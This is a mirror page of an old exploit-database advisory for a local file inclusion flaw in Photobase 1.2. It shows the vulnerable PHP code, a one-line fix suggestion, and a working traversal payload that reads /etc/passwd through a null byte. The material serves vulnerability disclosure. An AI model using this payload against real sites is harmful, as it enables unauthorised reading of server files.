bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/7733.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

45 lines
No EOL
1.2 KiB
Text
Raw Blame History

[START]
####################################################################################################################
[0x01] Informations:
Script : Photobase 1.2
Download : http://www.monstar.nl/php-bin/count.php3?what=photobase.zip&id=0
Vulnerability : Local File Inclusion
Author : Osirys
Contact : osirys[at]live[dot]it
Website : http://osirys.org
####################################################################################################################
[0x02] Bug: [Local File Inclusion]
######
Bugged file is: /[path]/include/header.php
[CODE]
<?php
include('include/conf.php');
include('include/functions.php');
if(isset($_GET['language']))
$language = $_GET['language'];
include('language/'.$language.'.php');
[/CODE]
There is an include of a variable coming from GET --> $language
[!FIX] Filter $language before the include or just set its value with a local file.
[!] EXPLOIT: /[path]/include/header.php?language=[local_file]
../../../../../../../../../../etc/passwd%00
####################################################################################################################
[/END]
# milw0rm.com [2009-01-11]
Reference in a new issue View git blame Copy permalink